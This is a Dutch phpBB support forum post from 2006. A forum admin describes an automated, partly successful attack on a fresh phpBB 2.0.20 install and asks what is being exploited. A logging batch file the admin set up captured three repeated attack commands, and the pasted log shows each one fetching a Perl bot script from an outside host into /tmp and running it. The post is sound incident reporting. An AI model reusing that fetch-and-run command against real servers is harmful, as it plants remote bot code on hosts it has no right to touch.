Hack poging
Geplaatst: 31 mei 2006, 09:41
Support template:
Het begon allemaal met wat vreemde foutmeldingen in de apache log. Hierin stond dat wget niet herkend werd, ongeveer zo:
'fds' is not recognized as an internal or external command,
operable program or batch file.
Toen hebben we een wget batchfile op de server gemaakt om eruit te komen waar dit vandaan kwam.
wget.bat:
VER | TIME >> C:\WINDOWS\system32\wgetlog.txt
ECHO %* >> C:\WINDOWS\system32\wgetlog.txt
Dit logt de argumenten en geeft een tijdstipje mee.
Laatste paar entries:
Wat ik in ieder geval al niet begrijp is dat er geen vage dingen in de access log of error log staan.
Ik heb gister al de hele dag zitten zoeken en ben er nog steeds niet uit, daarom dacht ik laat ik het hier maar eens vragen, misschien dat iemand hier veel meer van weet.
Iemand enig idee wat er geexploiteerd word?
- Wat is het probleem?
Het probleem is dat er een geautomatiseerde aanval op mijn forum plaatsvind die helaas (half) succesvol is.
Wanneer ontstond het probleem?
Niet helemaal zeker wanneer, begin mei hebben we het forum geinstalleerd.
Adres van je forum: http://
http://mtec-sf.ecorys.com
Geïnstalleerde mods:
attachment_mod.php,v 1.6,
een calendar mod version: 1.0.5 - 14/09/2003
(http://www.phpbb.com/phpBB/viewtopic.php?t=150857
Tja misschien is die het wel, die is best oud.. Ik denk dat ik het ga weghalen)
Huidige template:
subSilver
phpBB versie: 2.0.??
2.0.20
Waar is je forum gehost:
Hier in het gebouw op een server.
Heb je onlangs iets verandert aan je forum?
Vrij weinig, het is een verse install
Heb je gezocht naar een antwoord? Ja? met welke zoekwoorden?
Ja, ik heb heel google al afgezocht op zoek naar exploits voor 2.0.20 en de mods. Verder heb ik zitten googlen naar de .txt files die geprobeerd worden via WGET opgehaald te worden. Dit leverde weinig op. Ik vermoed dat het die Santy worm is. Maar die code is volgens mij secure in viewtopic.php
Het begon allemaal met wat vreemde foutmeldingen in de apache log. Hierin stond dat wget niet herkend werd, ongeveer zo:
'fds' is not recognized as an internal or external command,
operable program or batch file.
Toen hebben we een wget batchfile op de server gemaakt om eruit te komen waar dit vandaan kwam.
wget.bat:
VER | TIME >> C:\WINDOWS\system32\wgetlog.txt
ECHO %* >> C:\WINDOWS\system32\wgetlog.txt
Dit logt de argumenten en geeft een tijdstipje mee.
Laatste paar entries:
Code: Selecteer alles
The current time is: 10:08:36.32
Enter the new time:
http://www.mikes.educv.ro/albums/linuxdaybot.txt -O /tmp/.791; perl /tmp/.791; touch /tmp/.secret
The current time is: 10:08:36.39
Enter the new time:
http://www.mikes.educv.ro/albums/linuxdaybot.txt -O /tmp/.791; perl /tmp/.791; touch /tmp/.secret
The current time is: 10:08:36.43
Enter the new time:
http://www.mikes.educv.ro/albums/linuxdaybot.txt -O /tmp/.791; perl /tmp/.791; touch /tmp/.secret Als we op linux zouden draaien of wget hadden hadden we nu best een probleem.Ja jongens en meisjes, dat is niet zo leuk!
Wat ik in ieder geval al niet begrijp is dat er geen vage dingen in de access log of error log staan.
Ik heb gister al de hele dag zitten zoeken en ben er nog steeds niet uit, daarom dacht ik laat ik het hier maar eens vragen, misschien dat iemand hier veel meer van weet.
Iemand enig idee wat er geexploiteerd word?